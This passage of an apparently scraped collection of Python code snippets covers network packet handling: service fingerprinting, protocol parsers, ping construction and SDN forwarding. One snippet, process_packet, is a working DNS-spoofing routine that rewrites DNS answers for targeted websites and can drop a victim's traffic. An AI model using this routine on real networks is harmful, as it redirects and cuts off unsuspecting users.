\"27030\") or (sport == \"27035\") or (sport == \"27040\") or (sport == \"28015\") ):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Team Fortress') > -1):\n\t\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sport == \"27019\"):\t\t\t\t\t\t\t#halflife server\n\t\t\t\tif ((not LiveUDPService.has_key(SrcService)) or (LiveUDPService[SrcService] == False)):\n\t\t\t\t\tLiveUDPService[SrcService] = True\n\t\t\t\t\tReportId(\"US\", sIP, \"UDP_\" + sport, \"open\", \"halflife/server\")\n\t\t\telif ( (dport == \"1265\") or (dport == \"20100\") or (dport == \"21550\") or (dport == \"27000\") or (dport == \"27017\") or (dport == \"27018\") or (dport == \"27019\") or (dport == \"27022\") or (dport == \"27030\") or (dport == \"27035\") or (dport == \"27050\") or (dport == \"27078\") or (dport == \"27080\") or (dport == \"28015\") or (dport == \"28100\") or (dport == \"45081\") ):\t\t#Halflife client\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('Source Engine Query') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (dport == \"24441\"):\t\t\t#Pyzor\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif 
(Payload != None) and (Payload.find('User:') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"pyzor/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t#FIXME - interesting issue; the ttl<5 test will catch traceroutes coming into us, but not ones we're creating to go out. Hmmm.\n\t\t\telif ( (dport >= \"33434\") and (dport <= \"33524\") ) and (p['IP'].ttl <= 5):\t#udptraceroute client\n\t\t\t\tif ((not LiveUDPClient.has_key(sIP + \"UDP_33434\")) or (LiveUDPClient[sIP + \"UDP_33434\"] == False)):\n\t\t\t\t\tLiveUDPClient[sIP + \"UDP_33434\"] = True\n\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_33434\", \"open\", \"udptraceroute/client\")\n\t\t\telif (dport == \"40348\"):\n\t\t\t\tif ((not LiveUDPClient.has_key(SrcClient)) or (LiveUDPClient[SrcClient] == False)):\n\t\t\t\t\tif (Payload != None) and (Payload.find('HLS') > -1):\n\t\t\t\t\t\tLiveUDPClient[SrcClient] = True\n\t\t\t\t\t\tReportId(\"UC\", sIP, \"UDP_\" + dport, \"open\", \"halflife/client\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (p['IP'].frag > 0):\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"207.46.51.74\") or (sIP == \"65.55.251.10\"):\t\t\t\t#Bigfish.com - dns?\n\t\t\t\tUnhandledPacket(p)\n\t\t\telif (sIP == \"61.215.106.146\"):\t\t\t\t#junk\n\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tDebug(\"Other IP protocol (\" + str(p['IP'].src) + \"->\" + str(p['IP'].dst) + \"): \" + str(p['IP'].proto))\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x86DD:\t\t#IPv6\n\t\tUnhandledPacket(p)\n\telse:\n\t\tprint \"Unregistered ethernet type:\", p['Ethernet'].type\n\t\tUnhandledPacket(p)", "def packet_from_bytes(data: bytes) -> Packet:\n packet = PacketBase.from_buffer_copy(data)\n struct = packet.struct_type()\n if len(data) != struct.SIZE:\n raise racetools.errors.PacketSizeMismatch(struct.SIZE, len(data))\n return struct.from_buffer_copy(data)", "def struct_type(self) -> typing.Type[Packet]:\n for packet_type in (\n TelemetryData,\n RaceData,\n ParticipantsData,\n TimingsData,\n GameStateData,\n TimeStatsData):\n if self.packet_type == packet_type.TYPE and self.packet_version == packet_type.VERSION:\n return packet_type\n if self.packet_type == ParticipantVehicleNamesData.TYPE:\n if self.partial_packet_index == self.partial_packet_number:\n packet_type = VehicleClassNamesData\n else:\n packet_type = ParticipantVehicleNamesData\n if self.packet_version == packet_type.VERSION:\n return packet_type\n raise racetools.errors.UnrecognisedPacketType(self.packet_type, self.packet_version)", "def makePacket(bytes):\n header = makePacketHeader(bytes[0:8])\n md5 = bytes[8:24]\n data = bytes[24:24 + header.length]\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! 
(expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def translate_control_packet(self, multicast_packet):", "def createPacket(id):\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n header = getHeaderData(0, id)\n\n data = 192 * 'Q'\n\n checksum = getChecksum(header + data)\n\n header = getHeaderData(socket.htons(checksum), id)\n\n return header + data", "def packet_to_kml(packet, reader):\n\n try:\n src_ip = packet[IP].src\n src_kml = ip_to_kml(src_ip, reader)\n except:\n src_kml = None\n try:\n dest_ip = packet[IP].dest\n dest_kml = ip_to_kml(dest_ip, reader)\n except:\n dest_kml = None\n\n if src_kml is not None and dest_kml is not None:\n connect_kml = ips_to_line_kml(src_ip, dest_ip, reader)\n print(\"Added connection\")\n else:\n connect_kml = None\n\n return src_kml, dest_kml, connect_kml", "def extract_packet(_buffer):\n if len(_buffer)>=5:\n mtype=_buffer[0]\n msglen=struct.unpack('!L',_buffer[1:5])[0]\n if len(_buffer)>=msglen+1:\n return _buffer[5:msglen+1],mtype,_buffer[msglen+1:]\n return None,None,_buffer", "def _convert_dta(self, old_type):\n if old_type not in (Dta115,):\n msg = \"\".join(\n (\"conversion from {} \".format(old_type.__name__),\n \"to Dta117 not supported\"))\n raise TypeError(msg)\n self._ds_format = 117\n self._typlist = [i if i <= 244 else 65530 + (251 - i) \n for i in self._typlist]", "def __udp_preprocess_packet(self, seq):\n return b'06' + seq.to_bytes(4, 'big') \\\n + self.packets_status[seq][\"size\"].to_bytes(2, 'big') \\\n + self.packets_status[seq][\"payload\"]", "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def roughCook(self):\n\n # Set packet time\n cstSec = self.sec + RoughPacket.CST\n pktDate = time.strftime(\"%Y-%m-%d %H:%M:%S \", time.gmtime(cstSec))\n pktUsec = str(self.usec)[:3]\n 
self.pktTime = pktDate + pktUsec\n\n # Set packet length\n self.pktLen = len(self.pktData)\n\n # ----------\n # Link layer\n # ----------\n prototype, *_ = struct.unpack('!H', self.pktData[12:14])\n self.pktProt = RoughPacket.EtherMapUpper.get(prototype, 'Unknow')\n if self.pktProt == 'IP':\n srcIp, dstIp = struct.unpack('!4s 4s', self.pktData[26:34])\n self.pktSrc = getIpv4(srcIp)\n self.pktDst = getIpv4(dstIp)\n elif self.pktProt in ('IPv6', 'HOPOPT', 'IPv6-ICMP'):\n srcIpv6, dstIpv6 = struct.unpack('!16s 16s', self.pktData[22:54])\n self.pktSrc = getIpv6(srcIpv6)\n self.pktDst = getIpv6(dstIpv6)\n # elif self.pktProt in ('ARP', 'RARP', 'PPPoE-D', 'PPPoE-S'):\n else:\n dstMac, srcMac = struct.unpack('!6s 6s', self.pktData[:12])\n self.pktDst = getMacAddr(dstMac)\n self.pktSrc = getMacAddr(srcMac)\n\n self.appendProt(self.pktProt)\n\n # -------------\n # Network layer\n # -------------\n # IP protocol continue analysis upper protocol\n if self.pktProt == 'IP':\n self.ipHeaderLen = (self.pktData[14] & 15) * 4\n ipProt = int(self.pktData[23])\n self.pktProt = RoughPacket.IPMapUpper.get(ipProt, 'Unknow')\n\n # IPv6 protocol continue analysis upper protocol\n elif self.pktProt == 'IPv6':\n ipv6Prot = self.pktData[20]\n self.ipHeaderLen = 40\n self.pktProt = RoughPacket.IPMapUpper.get(ipv6Prot, 'Unknow')\n\n elif self.pktProt == 'PPPoE-S':\n pppProt = int(self.pktData[20:22].hex(), base=16)\n if pppProt == 0x0021:\n ipProt = int(self.pktData[31])\n self.pktProt = RoughPacket.IPMapUpper.get(ipProt, 'Unknow')\n self.ipHeaderLen = 20\n self.pppExtendLen = 8\n\n self.appendProt(self.pktProt)\n\n # ---------------\n # Transport layer\n # ---------------\n # UDP/TCP protocol continue analysis application protocol\n headerLen = self.ethHeaderLen + self.ipHeaderLen + self.pppExtendLen\n if self.pktProt == 'UDP':\n # 14 --> Ethernet, ipHeaderLen, 2 --> source port\n rawSrcPort = (self.pktData[headerLen + 0: headerLen + 2])\n srcPort, *_ = struct.unpack('!H', rawSrcPort)\n self.pktProt = RoughPacket.UDP_TCPMapUpper.get(srcPort,\n 'UDP')\n if self.pktProt == 'UDP':\n rawDstPort = (self.pktData[headerLen + 2: headerLen + 4])\n dstPort, *_ = struct.unpack('!H', rawDstPort)\n self.pktProt = RoughPacket.UDP_TCPMapUpper.get(dstPort,\n 'UDP')\n self.appendProt(self.pktProt)\n\n if self.pktProt == 'TCP':\n # 14 --> Ethernet, ipHeaderLen, 2 --> source port\n rawSrcPort = (self.pktData[headerLen + 0: headerLen + 2])\n srcPort, *_ = struct.unpack('!H', rawSrcPort)\n self.pktProt = RoughPacket.UDP_TCPMapUpper.get(srcPort, 'TCP')\n if self.pktProt == 'TCP':\n rawDstPort = (self.pktData[headerLen + 2: headerLen + 4])\n dstPort, *_ = struct.unpack('!H', rawDstPort)\n self.pktProt = RoughPacket.UDP_TCPMapUpper.get(dstPort,\n 'TCP')\n self.appendProt(self.pktProt)\n self.pktColor = RoughPacket.ProtColorMap.get(self.pktProt,\n QtGui.QColor(224, 224, 224,\n 255))\n\n # Generate package stack string\n stack = ''\n for prot in self.pktProtStack:\n decorProt = '[<< ' + prot + ' '\n stack = stack + decorProt\n self.pktStack = stack + len(self.pktProtStack) * '>>]'", "def _decode_next_layer(self, dict_, length=None):\n # make next layer protocol name\n proto = str(self._prot or 'Raw').lower()\n\n # make BytesIO from frame package data\n bytes_ = io.BytesIO(self._file.read(dict_['len']))\n info, protochain = self._import_next_layer(bytes_, length)\n\n # write info and protocol chain into dict\n self._protos = ProtoChain(self._prot, protochain)\n dict_[proto] = info\n dict_['protocols'] = self._protos.chain\n return dict_", "def 
packetDump(packet):\n hex = ''\n start = 0\n size = 16\n ln = len(packet)\n while start < ln:\n # print line number\n line = '%04x ' % start\n #print hex representation\n c = 0\n asc = packet[start:min(start+size, ln)]\n for b in asc:\n if c == 8:\n line = line + ' '\n line = line + '%02x ' % ord(b)\n c = c + 1\n line = ljust(line, 58) + '\"'\n # print ascii representation, replace unprintable characters with spaces\n for i in range(len(asc)):\n if ord(asc[i])<32 or ord(asc[i]) == 209:\n asc = replace(asc, asc[i], ' ')\n line = line + asc + '\"\\n' \n hex = hex + line\n start = start + size\n return hex.rstrip('\\n'), ln", "def get_link_type(comp_a, comp_b, link_type):\n need_to_verify = isinstance(comp_a, SpecialMixerComponent) or isinstance(comp_b, SpecialMixerComponent)\n if need_to_verify and link_type is not LinkType.horizontal:\n link_type = LinkType.matched_track_only\n return link_type", "def shortest_forwarding(self, msg, eth_type, ip_src, ip_dst):\r\n\r\n pkt = packet.Packet(msg.data)\r\n icmp_pkt = pkt.get_protocol(icmp.icmp)\r\n if icmp_pkt:\r\n ip_protocol = 1\r\n print 'icmp processing!'\r\n self.icmp_forwarding(msg, ip_protocol, eth_type, ip_src, ip_dst)\r\n return\r\n datapath = msg.datapath\r\n in_port = msg.match['in_port']\r\n tcp_pkt = None\r\n udp_pkt = None\r\n dst_port = self.awareness.get_host_location(ip_dst)[1]\r\n tcp_pkt = pkt.get_protocol(tcp.tcp)\r\n udp_pkt = pkt.get_protocol(udp.udp)\r\n L4_port = None\r\n flow_info = None\r\n flow_info_reverse = None\r\n\r\n # if not icmp packet,Get ip_proto and L4 port number.\r\n result = self.get_sw(datapath.id, in_port, ip_src, ip_dst) # result = (src_sw, dst_sw)\r\n if (result):\r\n src_sw, dst_sw = result[0], result[1]\r\n if setting.enable_Flow_Entry_L4Port:\r\n ip_proto, L4_port, Flag = self.get_L4_info(tcp_pkt, udp_pkt)\r\n if result:\r\n if dst_sw:\r\n src_sw, dst_sw = result[0], result[1]\r\n if ip_proto and L4_port and Flag:\r\n if ip_proto == 6:\r\n L4_Proto = 'TCP'\r\n elif ip_proto == 17:\r\n L4_Proto = 'UDP'\r\n else:\r\n pass\r\n L4_port.reverse()\r\n flow_info = (eth_type, ip_src, ip_dst, in_port, ip_proto, Flag, L4_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port, ip_proto, Flag, L4_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n else:\r\n flow_info = (eth_type, ip_src, ip_dst, in_port)\r\n flow_info_reverse = (eth_type, ip_dst, ip_src, dst_port)\r\n info = (ip_src, ip_dst, ip_proto, L4_port[0], L4_port[1])\r\n info2 = (ip_dst, ip_src, ip_proto, L4_port[1], L4_port[0])\r\n if (info in self.register) and (info2 in self.register):\r\n return\r\n self.register.append(info)\r\n self.register.append(info2)\r\n # dst_host and src_host link one same switch\r\n if self.newComingFlows['src'].has_key(ip_src):\r\n self.newComingFlows['src'][ip_src] += 1\r\n else:\r\n self.newComingFlows['src'][ip_src] = 1\r\n if self.newComingFlows['dst'].has_key(ip_dst):\r\n self.newComingFlows['dst'][ip_dst] += 1\r\n else:\r\n self.newComingFlows['dst'][ip_dst] = 1\r\n flowDemand = self._bandwidth_demand(ip_src, ip_dst)\r\n if src_sw == dst_sw:\r\n self.send_packet_out(datapath, msg.buffer_id, in_port, dst_port, msg.data)\r\n else:\r\n if not (str(src_sw).startswith('3') and str(dst_sw).startswith('3')):\r\n return\r\n paths = self.awareness.shortest_paths.get(src_sw).get(dst_sw)\r\n self.graph = self.monitor.graph\r\n path = self._select_paths1(flowDemand, paths)\r\n\r\n # path = self.get_path(src_sw, dst_sw, 
weight=self.weight)\r\n # Path has already been calculated, just get it.\r\n if path == None:\r\n return\r\n path.reverse()\r\n try:\r\n # bucket=self.swToSegments(path)\r\n # self.Segment_forwarding(flow_info,bucket)\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info_reverse, msg.buffer_id,\r\n ip_dst, ip_src, msg.data)\r\n path.reverse()\r\n if len(flow_info_reverse) == 7:\r\n L4_port.reverse()\r\n self.install_flow(self.datapaths, self.awareness.link_to_port, path, flow_info, msg.buffer_id, ip_src,\r\n ip_dst, msg.data)\r\n # self.compute_runing_time()\r\n\r\n except:\r\n self.flood(msg)", "def packet_from_xml_packet(xml_pkt, psml_structure=None):\n if not isinstance(xml_pkt, lxml.objectify.ObjectifiedElement):\n parser = lxml.objectify.makeparser(huge_tree=True, recover=True)\n try:\n xml_pkt = lxml.objectify.fromstring(xml_pkt, parser)\n except lxml.etree.XMLSyntaxError:\n res = re.findall(r'<field name=\"num\" pos=\"0\" show=\"(.*?)\"', xml_pkt.decode(), re.S)[0]\n print(f'Packet conversion error from xml to python object for packet number {res}.')\n return\n if psml_structure:\n return _packet_from_psml_packet(xml_pkt, psml_structure)\n return _packet_object_from_xml(xml_pkt)", "def ethernet_frame(packet):\n dest_mac, src_mac, proto = struct.unpack('! 6s 6s H', packet[:14])\n return get_mac_addr(dest_mac), get_mac_addr(src_mac), socket.htons(proto), packet[14:]", "def decode_packet(data):\n\n opcodes = [(\"AUTH_LOGON_CHALLENGE\", \"\\x00\"), (\"AUTH_LOGON_PROOF\", \"\\x01\")]\n opcode = data[0] # Opcode of the received packet (First byte)\n if opcode == opcodes[0][1]: # Auth Logon challenge\n srp_rcvd = {\n 'error': data[1], # (you should hope that it is always 0)\n 'B': data[3:35], # Read B and skip 1 field (Length_g)\n 'g': data[36:37], # Read g and skip 1 field (Length_n)\n 'N': data[38:70],\n 's': data[70:102], # Read salt\n 'crc': data[102:] # (useless for private servers)\n }\n return srp_rcvd\n if opcode == opcodes[1][1]:\n # Auth logon proof\n if data[1] == \"\\x00\": # Code error: 0\n srp_rcvd = {'login': 1}\n else:\n srp_rcvd = {'login': 0}\n return srp_rcvd", "def readPacket(stream):\n header = readPacketHeader(stream)\n md5 = stream.read(16)\n data = stream.read(header.length)\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! 
(expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def dump(self, packet):\n #self.print_table()\n src = packet[\"dst\"]\n dst = packet[\"src\"]\n routes_dump = []\n for route in self.routes:\n for verat in route[\"varats\"]:\n routes_dump.append({\"network\": verat[\"network\"], \"netmask\": verat[\"netmask\"],\n \"peer\": route[\"peer\"]})\n \n a = {\"src\": src, \"dst\": dst, \"type\": \"table\", \"msg\": routes_dump}\n return a", "def parse_from_dref(self, packet):\n\t\tname = packet[9:].strip(b'\\x00').decode('utf-8')\n\t\traw_value = packet[5:9]\n\t\tvalue = struct.unpack('f', raw_value)[0]\n\t\treturn name, value", "def parse_data(self, data):\n\t\tname, value = self.parse_from_dref(data)\n\t\tpacket = TrollPacket.from_name(name, value)\n\t\tself.update_listeners(packet)", "def dump(self, packet):\n # packet is already decoded\n msg = {\n SRCE: packet[DEST], \n DEST: packet[SRCE], \n TYPE: TABL,\n MESG: list(map(lambda r: ({ \n NTWK: r[MESG][NTWK],\n NMSK: r[MESG][NMSK],\n PEER: r[SRCE],\n }),\n self.routes))\n }\n self.sockets[packet[SRCE]].send(json.dumps(msg).encode())\n return True", "def packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n inPort = msg.match['in_port']\n\n packet = Packet(msg.data)\n etherFrame = packet.get_protocol(ethernet)\n\n if etherFrame.ethertype == ether.ETH_TYPE_LLDP:\n # ignore lldp packet\n return\n\n if etherFrame.ethertype == ether.ETH_TYPE_ARP:\n self.receive_arp(datapath, packet, etherFrame, inPort)\n elif etherFrame.ethertype == ether.ETH_TYPE_IP:\n self.receive_ip(datapath, packet, etherFrame, inPort)\n else:\n LOG.debug(\"receive Unknown packet %s => %s (port%d)\"\n % (etherFrame.src, etherFrame.dst, inPort))\n self.print_etherFrame(etherFrame)\n LOG.debug(\"Drop packet\")\n return 1\n return 0", "def get_payload(packet):\n #payload_len = get_payload_length(packet)\n adaptation_field_len = TS.get_adaptation_field_length(packet)\n header_size = 4 + adaptation_field_len\n return packet[header_size:]", "def process_packet(packet):\n # convert packet to scapy packet\n scapy_packet = scapy.IP(packet.get_payload())\n\n # looking DNS response\n # DNSRR: DNS response, DNSRQ: DNS request\n if scapy_packet.haslayer(scapy.DNSRR):\n # qname: url\n qname = scapy_packet[scapy.DNSQR].qname\n for website in websites:\n if website in qname:\n print(\"[+] Spoofing target\")\n # redirect to the ip that is specified in rdata\n answer = scapy.DNSRR(rrname=qname, rdata=ip)\n # modify answer part in DNS layer\n scapy_packet[scapy.DNS].an = answer\n scapy_packet[scapy.DNS].ancount = 1\n\n # avoid corruption\n del scapy_packet[scapy.IP].len\n del scapy_packet[scapy.IP].chksum\n del scapy_packet[scapy.UDP].chksum\n del scapy_packet[scapy.UDP].len\n\n packet.set_payload(str(scapy_packet))\n\n break\n\n print(scapy_packet.show())\n\n # forward the packet to destination\n packet.accept()\n # cut the internet connection of the target client\n # i.e. 
not allowing the packet to reach destination\n # packet.drop()", "def gen_ieee_packet(self, data):\n\t\tpacket = Dot15d4FCS() / Dot15d4Data() / Raw(load=data)\n\n\t\tpacket.fcf_srcaddrmode = 2\n\t\tpacket.fcf_destaddrmode = 2\n\n\t\tpacket.fcf_panidcompress = True\n\t\tpacket.fcf_ackreq = True\n\t\tpacket.seqnum = self.seqnum\n\n\t\tpacket.dest_panid = self.link_config.dest_panid\n\n\t\tpacket.dest_addr = self.link_config.destination.get_short_address()\n\t\tpacket.src_addr = self.link_config.source.get_short_address()\n\n\t\treturn packet.build()", "def handle_pkt_header(pkt, packets, index):\r\n dest_mac = pkt[0:12]\r\n str_dest_mac = dest_mac[0:2]\r\n for i in range(2, len(dest_mac), 2):\r\n str_dest_mac += \":\" + dest_mac[i:i+2]\r\n packets[index][0].append(str_dest_mac)\r\n src_mac = pkt[12:24]\r\n str_src_mac = pkt[0:2]\r\n for i in range(2, len(src_mac), 2):\r\n str_src_mac += \":\" + src_mac[i:i+2]\r\n packets[index][0].append(str_src_mac)\r\n etherType = pkt[24:28]\r\n packets[index][0].append(etherType)\r\n\r\n return packets", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n return", "def pack_package(id, size, ipv6):\n if size < int(struct.calcsize(\"d\")):\n return\n if ipv6:\n header = struct.pack('BbHHh', PingPackage.ICMP_TYPE_IP6,\n PingPackage.ICMP_CODE, PingPackage.ICMP_CHECKSUM,\n PingPackage.ICMP_ID, PingPackage.ICMP_SEQ_NR + id)\n else:\n header = struct.pack('bbHHh', PingPackage.ICMP_TYPE,\n PingPackage.ICMP_CODE, PingPackage.ICMP_CHECKSUM,\n PingPackage.ICMP_ID, PingPackage.ICMP_SEQ_NR + id)\n load = \"-- ARP PING PACKAGE! --\"\n size -= struct.calcsize(\"d\")\n rest = \"\"\n if size > len(load):\n rest = load\n size -= len(load)\n\n rest += size * \"X\"\n data = struct.pack(\"d\", time.time()) + rest\n packet = header + data\n checksum = PingPackage._get_cksum(packet)\n if ipv6:\n header = struct.pack('BbHHh', PingPackage.ICMP_TYPE_IP6,\n PingPackage.ICMP_CODE, checksum,\n PingPackage.ICMP_ID, PingPackage.ICMP_SEQ_NR + id)\n else:\n header = struct.pack('bbHHh', PingPackage.ICMP_TYPE,\n PingPackage.ICMP_CODE, checksum,\n PingPackage.ICMP_ID, PingPackage.ICMP_SEQ_NR + id)\n packet = header + data\n return packet", "def __parse(self, packet: bytes) -> TSPacket.TSPacket:\n p = TSPacket.TSPacket()\n try:\n b1, b23, b4 = struct.unpack('>BHB', packet[0:4])\n # 4-byte Transport Stream Header\n p.tsh_sync = b1\n p.tsh_tei = (b23 & 32768) >> 15\n p.tsh_pusi = (b23 & 16384) >> 14\n p.tsh_tp = (b23 & 8192) >> 13\n p.tsh_pid = b23 & 8191\n p.tsh_tsc = (b4 & 192) >> 6\n p.tsh_afc = (b4 & 48) >> 4\n p.tsh_cc = b4 & 15\n # Adaptation Field\n if p.tsh_afc == 2 or p.tsh_afc == 3:\n p.af_length = packet[4] # b1\n if p.af_length != 0:\n b2 = packet[5]\n p.af_disc = (b2 & 128) >> 7\n p.af_random = (b2 & 64) >> 6\n p.af_espi = (b2 & 32) >> 5\n p.af_pcrf = (b2 & 16) >> 4\n p.af_opcrf = (b2 & 8) >> 3\n p.af_spf = (b2 & 4) >> 2\n p.af_tpdf = (b2 & 2) >> 1\n p.af_afef = b2 & 1\n pos = 6\n if p.af_pcrf:\n # p.af_pcr = packet[6:12]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_pcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_opcrf:\n # p.af_opcr = packet[pos:(pos+6)]\n b14, b56 = struct.unpack('>LH', packet[6:12])\n p.af_opcr = ((b14 << 1) + (b56 >> 15)) * 300 + (b56 & 511)\n pos += 6\n if p.af_spf:\n p.af_sc = packet[pos]\n pos += 1\n if p.af_tpdf:\n l = packet[pos]\n pos += 1\n p.af_tpd = packet[pos:(pos+l)]\n pos += l\n if p.af_afef:\n l = packet[pos]\n pos += 1\n p.af_ae = packet[pos:(pos+l)]\n # Calculate payload start byte\n if 
p.tsh_afc == 1:\n p.payload = 4\n elif p.tsh_afc == 3:\n p.payload = 5 + p.af_length\n return p\n except Exception as err:\n logging.warning('TS packet parsing error:' + str(err))\n return None", "def printMatchedPacket(pkt, rule):\n\n if (IP in pkt):\n # IP Header\n displayMatchedIP(pkt[IP], rule)\n elif (IPv6 in pkt):\n displayIPv6(pkt[IPv6])\n if (TCP in pkt):\n # TCP Header\n displayMatchedTCP(pkt[TCP], rule)\n # Payload\n displayMatchedTCPPayload(pkt[TCP], rule)\n\n elif (UDP in pkt):\n displayUDP(pkt[UDP])\n print \"[UDP Payload]\"\n displayPayload(pkt[UDP])", "def convert_cast(node, **kwargs):\n name, input_nodes, attrs = get_inputs(node, kwargs)\n\n dtype = attrs[\"dtype\"]\n\n # dtype can be mapped only with types from TensorProto\n # float32 is mapped to float and float64 to double in onnx\n # following tensorproto mapping https://github.com/onnx/onnx/blob/master/onnx/mapping.py\n if dtype == 'float32':\n dtype = 'float'\n elif dtype == 'float64':\n dtype = 'double'\n\n node = onnx.helper.make_node(\n \"Cast\",\n input_nodes,\n [name],\n to=getattr(onnx.TensorProto, dtype.upper()),\n name=name,\n )\n return [node]", "def print_packet(self, pkt):\n ip_layer = pkt.getlayer(IP)\n print(\"[!] New Packet: {src} -> {dst}\".format(src=ip_layer.src, dst=ip_layer.dst))", "def encode_packet(self, packet):\n\n\t\ttry:\n\t\t\toutput = self.pack('ubyte', packet.ident)\n\t\t\tappend = ''\n\t\t\t#0x17\n\t\t\tif packet.ident == 0x17:\n\t\t\t\tif packet.data['unknown'] > 0:\n\t\t\t\t\tfor i in ('x2','y2','z2'):\n\t\t\t\t\t\tappend += self.pack('short', packet.data[i])\n\t\t\t#0x33\n\t\t\tif packet.ident in (0x33, 0x34):\n\t\t\t\tpacket.data['data_size'] = len(packet.data['data'])\n\t\t\t\tappend += self.pack_array_fast('byte', packet.data['data'])\n\t\t\t\n#\t\t\t#0x34\n#\t\t\tif packet.ident == 0x34:\n#\t\t\t\tcoords = []\n#\t\t\t\tbtypes = []\n#\t\t\t\tmetadata = []\n#\t\t\t\tfor i in packet.data['blocks']:\n#\t\t\t\t\tcoords.append(i['x'] << 12 | i['z'] << 8 | i['y'])\n#\t\t\t\t\tbtypes.append(i['type'])\n#\t\t\t\t\tmetadata.append(i['metadata'])\n#\t\t\t\t\n#\t\t\t\tpacket.data['data_size'] = len(coords)\n#\t\t\t\tappend += self.pack_array_fast('short', coords)\n#\t\t\t\tappend += self.pack_array_fast('byte', btypes)\n#\t\t\t\tappend += self.pack_array_fast('byte', metadata)\n\t\t\t\n\t\t\t#0x3C\n\t\t\tif packet.ident == 0x3C:\n\t\t\t\tarray = []\n\t\t\t\tfor i in packet.data['blocks']:\n\t\t\t\t\tarray += [i['x'], i['y'], i['z']]\n\t\t\t\tpacket.data['data_size'] = len(packet.data['blocks'])\n\t\t\t\tappend += self.pack_array_fast('byte', array)\n\t\t\t\n\t\t\t#0x68\n\t\t\tif packet.ident == 0x68:\n\t\t\t\tpacket.data['data_size'] = len(packet.data['slots_data'])\n\t\t\t\tappend += self.pack_array('slot', packet.data['slots_data'])\n\t\t\t#0x82: Sign\n\t\t\tif packet.ident == 0x82:\n\t\t\t\tfor i in range(4):\n\t\t\t\t\tpacket.data[\"line_%s\" % (i+1)] = packet.data[\"text\"][i]\n\t\t\t#0x83\n\t\t\tif packet.ident == 0x83:\n\t\t\t\tpacket.data['data_size'] = len(packet.data['data'])\n\t\t\t\tappend += self.pack_array_fast('byte', packet.data['data'])\n\t\t\n\t\t\tfor i in self.get_struct(packet):\n\t\t\t\toutput += self.pack(i[0], 